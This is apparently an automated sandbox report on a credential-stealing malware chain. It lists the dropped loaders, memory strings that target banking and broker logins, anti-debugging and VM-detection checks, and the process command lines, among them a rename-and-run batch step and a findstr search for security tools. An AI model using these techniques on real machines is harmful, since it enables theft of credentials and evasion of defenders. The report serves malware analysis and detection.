Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: KJEHJKJE.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: KJEHJKJE.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: KJEHJKJE.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: KJEHJKJE.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.00000000026F9000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.0000000002825000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3029095226.000001F16D6CC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2918689311.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2942846800.000001F16D745000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000028.00000002.2884438644.000002618E7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2856295783.00000130BDC1D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: KJEHJKJE.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RA
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: KJEHJKJE.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: KJEHJKJE.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RoamingBKKFHIEGDH.exe, 00000005.00000002.2273581727.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: build2.exe, 0000002C.00000003.2918689311.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2942846800.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.3002033924.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2917481359.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2968342255.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3029095226.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2927088647.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2999657910.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2979868835.000001F16D745000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW~V
Source: KJEHJKJE.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: ba77748b9b.exe, 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: KJEHJKJE.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: KJEHJKJE.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: KJEHJKJE.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWU.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: KJEHJKJE.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: KJEHJKJE.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: KJEHJKJE.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: KJEHJKJE.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: KJEHJKJE.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: buildred.exe, 0000001A.00000002.2947483134.00000000065A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2866002491.00000130BDD00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: firefox.exe, 0000002F.00000002.2851889197.00000130BD806000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW"<
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Code function: 5_2_04EC0983 rdtsc 5_2_04EC0983
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000 0_2_00404610
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419160 mov eax, dword ptr fs:[00000030h] 0_2_00419160
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041C8D9 SetUnhandledExceptionFilter, 0_2_0041C8D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041A718
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C70B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C70B1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8BAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C8BAC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ba77748b9b.exe PID: 3144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ba77748b9b.exe PID: 8448, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\ead6a72944.exe "C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe "C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe "C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe "C:\Users\user\AppData\Local\Temp\1000028001\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\1000003002\ead6a72944.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: firefox.exe, 00000028.00000002.2853946051.000000BCB0EBB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?ProgmanListenerWindow
Source: axplong.exe, axplong.exe, 0000000A.00000002.2311209476.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: TProgram Manager
Source: PharmaciesDetection.exe, 00000015.00000003.2671343184.00000000027AB000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr Binary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd-CALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEGUIGETSTYLECONTROL
Source: RoamingAEGIJKEHCA.exe, RoamingAEGIJKEHCA.exe, 00000008.00000002.2345735174.00000000005CE000.00000040.00000001.01000000.0000000B.sdmp, explorti.exe, 0000000F.00000002.2374969784.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000010.00000002.2374830999.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: FM/Program Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70B341 cpuid 0_2_6C70B341
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00417630
